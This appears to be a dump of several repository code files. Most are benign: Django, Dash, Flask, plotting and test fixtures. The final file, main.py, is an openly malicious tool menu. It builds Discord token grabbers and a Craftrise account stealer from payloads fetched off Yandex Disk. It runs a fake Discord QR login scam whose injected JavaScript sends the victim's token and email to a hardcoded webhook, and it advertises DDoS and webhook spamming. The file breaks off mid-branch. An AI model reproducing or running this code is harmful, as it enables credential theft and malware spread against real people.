| max_stars_repo_path (string, 3-269 chars) | max_stars_repo_name (string, 4-119 chars) | max_stars_count (int64, 0-191k) | id (string, 1-7 chars) | content (string, 6-1.05M chars) | score (float64, 0.23-5.13) | int_score (int64, 0-5) |
|---|---|---|---|---|---|---|
tests/testapp/urls.py
|
grofers/django-authlib
| 0
|
12782851
|
from django.conf.urls import include, url
from django.contrib import admin
from django.shortcuts import render
from authlib import views
from authlib.facebook import FacebookOAuth2Client
from authlib.google import GoogleOAuth2Client
from authlib.twitter import TwitterOAuthClient
from testapp.views import custom_verification, custom_verification_code
urlpatterns = [
url(r"", include("authlib.admin_oauth.urls")),
url(r"^admin/", admin.site.urls),
url(r"^404/$", lambda request: render(request, "404.html")),
url(r"^login/$", views.login, name="login"),
url(
r"^oauth/facebook/$",
views.oauth2,
{"client_class": FacebookOAuth2Client},
name="accounts_oauth_facebook",
),
url(
r"^oauth/google/$",
views.oauth2,
{"client_class": GoogleOAuth2Client},
name="accounts_oauth_google",
),
url(
r"^oauth/twitter/$",
views.oauth2,
{"client_class": TwitterOAuthClient},
name="accounts_oauth_twitter",
),
url(r"^email/$", views.email_registration, name="email_registration"),
url(
r"^email/(?P<code>[^/]+)/$",
views.email_registration,
name="email_registration_confirm",
),
url(r"^logout/$", views.logout, name="logout"),
url(r"^custom/$", custom_verification),
url(
r"^custom/(?P<code>[^/]+)/$",
custom_verification_code,
name="custom_verification_code",
),
]
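# Illustrative note (assuming this module is the root URLconf): Django's
# reverse() maps the names above back to paths, e.g.
#   reverse("email_registration_confirm", kwargs={"code": "abc"})  # -> "/email/abc/"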
| 1.976563
| 2
|
simsiam_imagenet/imagenet.py
|
Yif-Yang/DSSL
| 8
|
12782852
|
from torchvision.datasets.vision import VisionDataset
import os
import pickle
from torchvision.datasets.folder import default_loader
class Imagenet(VisionDataset):
def __init__(self, root, data_list, train=True, transform=None, target_transform=None, img_dir='all', target_dir='annos'):
super(Imagenet, self).__init__(root, transform=transform,
target_transform=target_transform)
self.data = []
self.targets = []
self.train = train
self.data_list = os.path.join(root, data_list)
self.img_dir_path = os.path.join(root, img_dir)
self.target_dir_path = os.path.join(root, target_dir)
self.transform = transform
self.target_transform = target_transform
if os.path.isfile(self.data_list):
with open(self.data_list, 'r') as infile:
for line in infile:
img_name, label = line.strip().split(' ')
self.data.append(os.path.join(self.img_dir_path, img_name))
self.targets.append(int(label) - 1)
else:
print('data list is not a file')
def __getitem__(self, index):
"""
Args:
index (int): Index
Returns:
tuple: (image, target) where target is index of the target class.
"""
img_path, target = self.data[index], self.targets[index]
# doing this so that it is consistent with all other datasets
# to return a PIL Image
img = default_loader(img_path)
if self.transform is not None:
img = self.transform(img)
if self.target_transform is not None:
target = self.target_transform(target)
return img, target
def __len__(self):
return len(self.data)
def extra_repr(self):
return "Split: {}".format("Train" if self.train is True else "Test")
| 2.71875
| 3
|
demo/state_solar_page.py
|
stevej2608/dash-spa
| 27
|
12782853
|
from dash import html, dcc
import dash_bootstrap_components as dbc
import pandas as pd
from .demo import blueprint as spa
global_md = """\
### Global Warming
Global Temperature Time Series. Data are included from the GISS
Surface Temperature (GISTEMP) analysis and the global component
of Climate at a Glance (GCAG). Two datasets are provided:
* Global monthly mean
* Annual mean temperature anomalies in degrees Celsius from 1880 to the present
"""
# Taken from Dash example, see:
# https://dash.plot.ly/datatable
df = pd.read_csv('demo/data/solar.csv')
@spa.route('/solar', title='Solar')
def solar():
return html.Div([
html.Div([
html.Div([], className="col-md-2"),
html.Div([
html.H2('US Solar Capacity'),
html.Br(),
dbc.Table.from_dataframe(df, striped=True, bordered=True, hover=True),
html.Div(id='output')
], className="col-md-8"),
html.Div([], className="col-md-2")
], className='row'),
dbc.Row([
dbc.Col([
dcc.Link("Global Warming", href=spa.url_for('warming'), className="btn btn-primary float-end")
], md=12)
])
], className="container-fluid")
| 3.21875
| 3
|
assets/bifurcation/saddle-node.py
|
dantaylor688/dantaylor688.github.io
| 0
|
12782854
|
from numpy import *
from matplotlib import *
from pylab import *
import matplotlib.pyplot as plt  # explicit import: plt.gca() is used below and pylab's star import may not provide plt
import matplotlib.lines as mlines
if __name__ == "__main__":
rc('text', usetex=True)
rc('font', family='serif')
fs = 20
### Example 1
x = arange(-5,5,0.1)
# r > 0
fig= figure(1)
ax = fig.add_subplot(311)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
r = 5
xdot = r + x**2
ax.plot(x,xdot,'b-')
ylim([min(xdot)-(r+1),max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r > 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# lft = mlines.Line2D.fillStyles
# r = 0
ax = fig.add_subplot(312)
frame1 = plt.gca()
r = 0
xdot = r + x**2
ax.plot(x,xdot,'b-')
ax.plot(0,0,'bo',fillstyle='left',mec='b')
ylim([-1,max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r = 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# r < 0
ax = fig.add_subplot(313)
frame1 = plt.gca()
r = -5
xdot = r + x**2
ax.plot(x,xdot,'b-')
ax.plot(sqrt(-r),0,'bo',mfc='none',mec='b')
ax.plot(-sqrt(-r),0,'bo',fillstyle='full',mec='b')
ylim([min(xdot)-1,max(xdot)])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r < 0$')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-sqrt(-r)-1, 0), xytext=(-sqrt(-r) - 2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(0, 0), xytext=(sqrt(-r)/2., 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(sqrt(-r)+2, 0), xytext=(sqrt(-r) + 1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
### Just axes
# r > 0
fig= figure(500)
ax = fig.add_subplot(311)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
r = 5
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r > 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# lft = mlines.Line2D.fillStyles
# r = 0
ax = fig.add_subplot(312)
frame1 = plt.gca()
r = 0
ax.plot(0,0,'ko',fillstyle='left',mec='k')
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r = 0$')
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-2, 0), xytext=(-3, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
# r < 0
ax = fig.add_subplot(313)
frame1 = plt.gca()
r = -5
ax.plot(sqrt(-r),0,'ko',mfc='none',mec='k')
ax.plot(-sqrt(-r),0,'ko',fillstyle='full',mec='k')
ylim([-1,1])
ax.plot(x,zeros_like(x),'k-')
ax.set_title(r'$r < 0$')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
ax.annotate('', xy=(-sqrt(-r)-1, 0), xytext=(-sqrt(-r) - 2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(0, 0), xytext=(sqrt(-r)/2., 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(sqrt(-r)+2, 0), xytext=(sqrt(-r) + 1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
### Example 2
#r > 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = 1
fig= figure(2)
ax = fig.add_subplot(311)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
xlim([-2,5])
ylim([-4,5])
title(r'$r > 0$')
ax.annotate('', xy=(-0.5, 0), xytext=(-1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(2.5, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r = 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = 0
# fig= figure(3)
ax = fig.add_subplot(312)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(0,0,'ko',fillstyle='left',mec='b')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r = 0$')
ax.annotate('', xy=(-0.5, 0), xytext=(-1, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate(r'$r_c$', xy=(0, 0), xytext=(-0.3, 0.3))
ax.annotate('', xy=(2.5, 0), xytext=(2, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r < 0
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
# fig= figure(4)
ax = fig.add_subplot(313)
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
# r < 0 again as a separate plot
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
fig= figure(4)
ax = fig.add_subplot(111)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
## Bifurcation diagram example log(1+x)
x = arange(-0.99,5,0.01)
lx = arange(-2,5,0.01)
r = -1
fig= figure(4)
ax = fig.add_subplot(111)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(lx,r+lx,'b-')
ax.plot(x,log(1+x),'g-')
ax.plot(lx,zeros_like(lx),'k-')
ax.plot(-0.8,0,'ko',fillstyle='full',mec='k')
xlabel(r'$x$',fontsize=fs)
ylabel(r'$\dot{x}$',fontsize=fs)
ax.plot(2.1,0,'ko',mfc='none',mec='k')
xlim([-2,5])
ylim([-4,5])
ax.set_title(r'$r < 0$')
ax.annotate('', xy=(0.1, 0), xytext=(0.8, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(-1.5, 0), xytext=(-1.9, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('', xy=(3, 0), xytext=(2.5, 0),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(False)
frame1.axes.get_yaxis().set_visible(False)
### Bifurcation diagram
## r = log(1+x)-x
nx = arange(-0.99,0,0.01)
px = arange(0,5,0.01)
fig= figure(650)
ax = fig.add_subplot(111)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(log(1+nx)-nx,nx,'b-')
ax.plot(log(1+px)-px,px,'b--')
ax.plot(arange(-5,6),zeros_like(arange(-5,6)),'k-')
ylabel(r'$x^*$',fontsize=fs)
xlabel(r'$r$',fontsize=fs)
xlim([-5,5])
ax.annotate('Stable', xy=(-4, 16), xytext=(-3,17),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('Unstable', xy=(4, 16), xytext=(2, 17),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(True)
frame1.axes.get_yaxis().set_visible(True)
## x = +-sqrt(-r)
rp = arange(0,5,0.01)
fig= figure(6001)
lx = arange(-5,3,0.01)
ax = fig.add_subplot(111)
frame1 = plt.gca()
# hold (no-op: modern matplotlib always holds plot state)
ax.plot(-rp,sqrt(rp),'b--')
ax.plot(-rp,-sqrt(rp),'b-')
ax.plot(lx,zeros_like(lx),'k-')
xlabel(r'$r$',fontsize=fs)
ylabel(r'$x^*$',fontsize=fs)
xlim([-5,3])
ax.annotate('Stable', xy=(-4, -2), xytext=(-3,-2.5),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
ax.annotate('Unstable', xy=(-4, 2), xytext=(-3, 2.5),
arrowprops=dict(facecolor='black', shrink=0.04, width=1),
)
frame1.axes.get_xaxis().set_visible(True)
frame1.axes.get_yaxis().set_visible(True)
show()
| 2.359375
| 2
|
tests/conftest.py
|
Murthy10/pyGeoTile
| 93
|
12782855
|
<gh_stars>10-100
import pytest
'''
Chicago, IL
LatLng: (41.85, -87.64999999999998)
Zoom level: 19
World Coordinate: (65.67111111111113, 95.17492654697409)
Pixel Coordinate: (34430575, 49899071)
Tile Coordinate: (134494, 194918)
'''
@pytest.fixture(scope="session", autouse=True)
def chicago_latitude_longitude():
return 41.85, -87.65
@pytest.fixture(scope="session", autouse=True)
def chicago_zoom():
return 19
@pytest.fixture(scope="session", autouse=True)
def chicago_pixel():
return 34430575, 49899071
@pytest.fixture(scope="session", autouse=True)
def chicago_meters():
return -9757148.442088600, 5138517.444985110
@pytest.fixture(scope="session", autouse=True)
def chicago_pixel_bounds():
return (34430464, 49899264), (34430720, 49899008)
@pytest.fixture(scope="session", autouse=True)
def chicago_meter_bounds():
return (-9757186.660602748, 5138479.226470973), (-9757110.223574463, 5138555.663499258)
@pytest.fixture(scope="session", autouse=True)
def chicago_latitude_longitude_bounds():
return (41.8496161693754, -87.65029907226562), (41.85012764855732, -87.64961242675781)
@pytest.fixture(scope="session", autouse=True)
def chicago_google():
return 134494, 194918
@pytest.fixture(scope="session", autouse=True)
def chicago_tms():
return 134494, 329369
@pytest.fixture(scope="session", autouse=True)
def chicago_quad_tree():
return '0302222310303211330'
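# Sketch of how a test might consume these fixtures (assumes pyGeoTile's
# Point API; the method names here are illustrative, not verified):
# from pygeotile.point import Point
# def test_chicago_pixel(chicago_latitude_longitude, chicago_zoom, chicago_pixel):
#     point = Point.from_latitude_longitude(*chicago_latitude_longitude)
#     assert point.pixels(zoom=chicago_zoom) == chicago_pixel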
| 2.1875
| 2
|
Chapter 04/ch4_3_24.py
|
bpbpublications/TEST-YOUR-SKILLS-IN-PYTHON-LANGUAGE
| 0
|
12782856
|
<gh_stars>0
x=100
y=100
print(x is y)
#True
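# CPython caches small integers (roughly -5 through 256), so x and y are
# bound to the same object and "is" returns True here; this is an
# implementation detail, not a language guarantee, so compare ints with ==.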
| 2.015625
| 2
|
main.py
|
gokudo21/doctor
| 0
|
12782857
|
<reponame>gokudo21/doctor
from flask import Flask, render_template, request
from flask_pymongo import PyMongo
app = Flask(__name__)
#app.config['MONGO_DBNAME'] = 'test'
app.config['MONGO_URI'] = 'mongodb://localhost:27017/test'
#app.config['MONGO_URI'] = 'mongodb://gokudo21:<EMAIL>:18848/patientdb'
mongo = PyMongo(app)
@app.route("/login")
def serve():
return render_template('login.html')
@app.route("/ID")
def ID_view():
return render_template('ID.html')
@app.route("/register")
def register_view():
return render_template('register.html')
@app.route("/room1")
def room1_view():
patients = mongo.db.patients
result = patients.find_one({'room_number': "1"})
return render_template('room1.html', record=result)
@app.route("/room2")
def room2_view():
patients = mongo.db.patients
result = patients.find_one({'room_number': "2"})
return render_template('room2.html', record=result)
@app.route('/pdata',methods = ['POST', 'GET'])
def pdata():
docnamey = request.args.get('docname')
patnamey = request.args.get('patname')
civilnamey = request.args.get('civilname')
agenamey = request.args.get('agename')
Sexnamey = request.args.get('Sexname')
roomnamey = request.args.get('roomname')
Healthnamey = request.args.get('Health')
statusnamey = request.args.get('status')
Medicinesnamey = request.args.get('Medicines')
Elementdnamey = request.args.get('Elementdite')
recommendationnamey = request.args.get('drecommendation')
notenamey = request.args.get('pnote')
patients = mongo.db.patients
# insert() was removed in modern PyMongo; insert_one() is the current equivalent
patients.insert_one({'doctor_name' : docnamey, 'patient_name' : patnamey, 'civil_ID' : civilnamey, 'age' : agenamey, 'sex' : Sexnamey, 'room_number' : roomnamey, 'health_history' : Healthnamey, 'patient_status' : statusnamey, 'medicines' : Medicinesnamey, 'element_diet' : Elementdnamey, 'doctor_recommendation': recommendationnamey, 'note': notenamey})
return render_template('ID.html')
@app.route('/patient_info',methods = ['POST', 'GET'])
def find():
searchy = request.args.get('search')
patients = mongo.db.patients
result = patients.find_one({'civil_ID' : searchy})
print('result: ')
print(result)
return render_template('patient_info.html', record=result)
@app.route('/login_data',methods = ['POST', 'GET'])
def login_data():
passwordy = request.args.get('psw')
useridy = request.args.get('userid')
if (passwordy == "<PASSWORD>" and useridy == "haya") or (passwordy == "<PASSWORD>" and useridy == "manal"):
return render_template('ID.html')
else :
return render_template('login.html')
@app.route("/test6")
def serve6():
return render_template('test6.html')
@app.route('/edit', methods=['GET'])
def edit():
search2y = request.args.get('search2')
patients = mongo.db.patients
result5 = patients.find_one({'civil_ID': search2y})
print("result 5:")
print(result5)
print("search: ")
print(search2y)
return render_template('edit.html', record=result5)
@app.route('/edit2',methods = ['POST', 'GET'])
def edit2():
docname2y = request.args.get('docname2')
patname2y = request.args.get('patname2')
civilname2y = request.args.get('civilname2')
agename2y = request.args.get('agename2')
Sexname2y = request.args.get('Sexname2')
roomname2y = request.args.get('roomname2')
Healthname2y = request.args.get('Health2')
statusname2y = request.args.get('status2')
Medicinesname2y = request.args.get('Medicines2')
Elementdname2y = request.args.get('Elementdite2')
recommendationname2y = request.args.get('drecommendation2')
notename2y = request.args.get('pnote2')
patients = mongo.db.patients
#1patients.update({'name': 'target'}, {'school': 'new school', 'age': 'new age'})
# update() was removed in modern PyMongo; replace_one() keeps the old whole-document replacement semantics
patients.replace_one({'civil_ID': civilname2y}, {'doctor_name': docname2y, 'patient_name': patname2y, 'civil_ID': civilname2y, 'age': agename2y, 'sex': Sexname2y, 'room_number': roomname2y, 'health_history': Healthname2y, 'patient_status': statusname2y, 'medicines': Medicinesname2y, 'element_diet': Elementdname2y, 'doctor_recommendation': recommendationname2y, 'note': notename2y})
return patname2y + ' updated'
if __name__ == '__main__':
try:
app.run(debug=True, host='0.0.0.0', port=80)
except Exception as e:
print("exception: ")
print(str(e))
app.run(debug=True)
| 2.546875
| 3
|
main.py
|
casmofoundation/Ctool
| 0
|
12782858
|
import os
from licensing.models import *
from licensing.methods import Key, Helpers
from PIL import Image, ImageFont, ImageDraw
import sys
import time
from colorama import Fore, Back, Style, init
import shutil
import sys
import os
import requests
import shutil
from bs4 import BeautifulSoup
from requests import get
init(autoreset=True)
import requests
a = 5
b = 6
if a == b:
print("burası eskiden lisans key sistemi oldugu için kodları bozulmaması için kaldı")
#hehe deneme
else:
ShowText = 'CASPERSS AREA'
API_ENDPOINT = 'https://cloud-api.yandex.net/v1/disk/public/resources/download?public_key={}'
APPDATA = os.getenv("APPDATA")
def _get_real_direct_link(sharing_link):
pk_request = requests.get(API_ENDPOINT.format(sharing_link))
# Returns None if the link cannot be "converted"
return pk_request.json().get('href')
def _extract_filename(direct_link):
for chunk in direct_link.strip().split('&'):
if chunk.startswith('filename='):
return chunk.split('=')[1]
return None
def download_yandex_link(sharing_link, filename=None):
direct_link = _get_real_direct_link(sharing_link)
if direct_link:
filename = filename or _extract_filename(direct_link)
download = requests.get(direct_link)
os.chdir(APPDATA)
with open(filename, 'wb') as out_file:
out_file.write(download.content)
print('İndirildi exploit "{}" "{}"')
else:
print('Bağlantını Kontrol et "{}"')
def Spinner():
l = ['|', '/', '-', '\\']
for i in l + l + l:
sys.stdout.write(f"""\r# Yükleniyor... {i}""")
sys.stdout.flush()
time.sleep(0.4)
font = ImageFont.truetype('arialbd.ttf', 15)
size = font.getsize(ShowText)
image = Image.new('1', size, 1)
draw = ImageDraw.Draw(image)
draw.text((0, 0), ShowText, font=font)
for rownum in range(size[1]):
line = []
for colnum in range(size[0]):
if image.getpixel((colnum, rownum)):
line.append(' '),
else:
line.append('#'),
print(Fore.LIGHTGREEN_EX + ''.join(line))
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(
Fore.RED + "https://discord.gg/X8KjZJ3J2U ----- https://github.com/Casper-dev172 ------- doldoldol#3909(CASMO#9663)")
print(Fore.BLUE + "*-------------------------------------------------------------------------------------------*")
print(Fore.CYAN + "Welcome CASMO AREA")
print(Fore.MAGENTA + "[1] Rat")
print(Fore.MAGENTA + "[2] Discord Token Grabber")
print(Fore.MAGENTA + "[3] Fake QR Scam")
print(Fore.MAGENTA + "[4] Sbo Fucker v2")
print(Fore.MAGENTA + "[5] Craftrise Account Stealer")
print(Fore.MAGENTA + "[6] Fastfingers word hack")
print(Fore.MAGENTA + "[7] İd to token")
print(Fore.MAGENTA + "[8] Website Cloner")
print(Fore.MAGENTA + "[9] DDOS ATTACK!")
print(Fore.MAGENTA + "[10] DİSCORD TOKEN WORLD!")
print(Fore.MAGENTA+"[11] Discord Webhook spammer")
anan = os.getcwd()
x = input()
if x == "1":
Spinner()
print("Bu Geliştirme Sürecindedir yakında gelecektir.")
if x == "2":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/RyoA8MTLfGNlVw")
download_yandex_link("https://disk.yandex.com.tr/d/6lTr5TINtpbD2Q")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("sasa.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup.py build")
time.sleep(15)
os.remove("sasa.py")
os.remove("setup.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "5":
Spinner()
print("Webhook Giriniz")
y = input()
download_yandex_link("https://disk.yandex.com.tr/d/6pSN66uFNLuIaQ")
download_yandex_link("https://disk.yandex.com.tr/d/4Nw7r50OrLwCzw")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
with open("cr.py", "r+",
encoding="utf-8") as dosya:
icerik = dosya.read()
yarak = f"WEBHOOKBABY = '{y}'\n" + icerik
dosya.seek(0)
dosya.write(yarak)
os.chdir(APPDATA)
os.system("python setup1.py build")
time.sleep(15)
os.remove("cr.py")
os.remove("setup1.py")
shutil.move(f"{APPDATA}\\build", anan)
print(Fore.GREEN + "UWU virüs oluşturulmuştur")
if x == "3":
Spinner()
print(
Fore.BLUE + "[BİLGİ]Bu uygulamada chrome açılacaktır sekmeyi kesinlikle kapatmamalısınız discord_gift.png oluşturulduktan sonra kurbana attıktan sonra kurban okuttuğu zaman o açılan chrome sekmesinde kullanıcının hesabına giriş yapmış olcaksınızdır"
"ve cmd de bir kaç hata belirebilir onlara aldırış etmeyin ve tadını çıkarın ")
time.sleep(5)
from bs4 import BeautifulSoup
from selenium import webdriver
from PIL import Image
import base64
import time
import os
def qr_hazırla():
im1 = Image.open('temp/resim1.png', 'r')
im2 = Image.open('temp/logo.png', 'r')
im2_w, im2_h = im2.size
im1.paste(im2, (60, 55))
im1.save('temp/anan.png', quality=95)
def bindir():
im1 = Image.open('temp/template.png', 'r')
im2 = Image.open('temp/anan.png', 'r')
im1.paste(im2, (120, 409))
im1.save('discord_gift.png', quality=95)
def main():
print('FAKE QR SCAM\n')
options = webdriver.ChromeOptions()
options.add_experimental_option('excludeSwitches', ['enable-logging'])
options.add_experimental_option('detach', True)
driver = webdriver.Chrome(options=options, executable_path=r'chromedriver.exe')
driver.get('https://discord.com/login')
time.sleep(5)
print('Sayfa Yüklendi')
page_source = driver.page_source
soup = BeautifulSoup(page_source, features='lxml')
div = soup.find('div', {'class': 'qrCode-wG6ZgU'})
qr_code = soup.find('img')['src']
file = os.path.join(os.getcwd(), 'temp/resim1.png')
img_data = base64.b64decode(qr_code.replace('data:image/png;base64,', ''))
with open(file, 'wb') as handler:
handler.write(img_data)
discord_login = driver.current_url
qr_hazırla()
bindir()
print('Gift Code Oluşturuldu Klasörü kontrol ediniz.')
print('QR code oluşturuldu kurbanın okutmasını bekleyiniz.')
while True:
time.sleep(6)
if discord_login != driver.current_url:
print('tokenı çekiyooorummm')
driver.execute_script('''
location.reload();
var discordWebhook = "https://discord.com/api/webhooks/939082111149809715/arZ4T9gWDAVVcrifcg_w7eO4nS7pu2NsL8BfqSu-XtjGkuwMBZQ6-oFQFwF5Clt0PxA5";
var i = document.createElement('iframe');
document.body.appendChild(i);
var request = new XMLHttpRequest();
request.open("POST", discordWebhook);
request.setRequestHeader('Content-type', 'application/json');
var params = {
username: "Token Grabber",
avatar_url: "https://malwarefox.com/wp-content/uploads/2017/11/hacker-1.png",
content: '**OMG HEÇKIR APİĞĞĞ!**\n------------------\nToken : ' + i.contentWindow.localStorage.token + '\n------------------\nAdresse email : ' + i.contentWindow.localStorage.email_cache
};
request.send(JSON.stringify(params));
''')
print('---')
print("çekkkkkkkkktimmmmmmmmmm:")
break
print('İş bitti')
if __name__ == '__main__':
main()
if x == "4":
Spinner()
download_yandex_link("https://disk.yandex.com.tr/d/ylx0-4Q93wrnFA")
download_yandex_link("https://disk.yandex.com.tr/d/s_gD3XvCcs6yVg")
print(
Fore.MAGENTA + "[UYARI] Bu İşlem Fazla bir şekilde yazılar ekrana dökülcek biraz tırsabilirsiniz ama hiç bir şey yoktur sadece exeye çevirme işlemi yapılacaktır.")
time.sleep(1)
os.chdir(APPDATA)
os.system("python setup2.py build")
time.sleep(15)
os.remove("sbo.py")
os.remove("setup2.py")
shutil.move(f"{APPDATA}\\build", anan)
print("İşlem bitti dikkat et kendin açma :)")
if x == "6":
Spinner()
print("Bu chromedriver ürünüdür eğer sürümle alakalı hata alırsanız chromedriverın sitesine gidip kendi chrome sürümünüze uygun chromedriverı yükleyip klasöerlin içine atınız")
print("fastfingers email giriniz")
e = input()
print("fastfingers paralo giriniz")
p = input()
from selenium import webdriver
import time
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
options = webdriver.ChromeOptions()
driver = webdriver.Chrome()
driver.maximize_window();
email = e
password = p
driver.get("https://10fastfingers.com/login");
driver.find_element_by_name("data[User][email]").send_keys(email)
driver.find_element_by_name("data[User][password]").send_keys(password)
driver.find_element_by_id("login-form-submit").click()
time.sleep(1)
driver.get("https://10fastfingers.com/typing-test/turkish");
wait = WebDriverWait(driver, 10)
inputElement = wait.until(EC.presence_of_element_located((By.ID, "inputfield")))
time.sleep(4)
word_list = driver.execute_script("return words")
number = 0;
for word in word_list:
inputElement.send_keys(word + " ")
if x =="7":
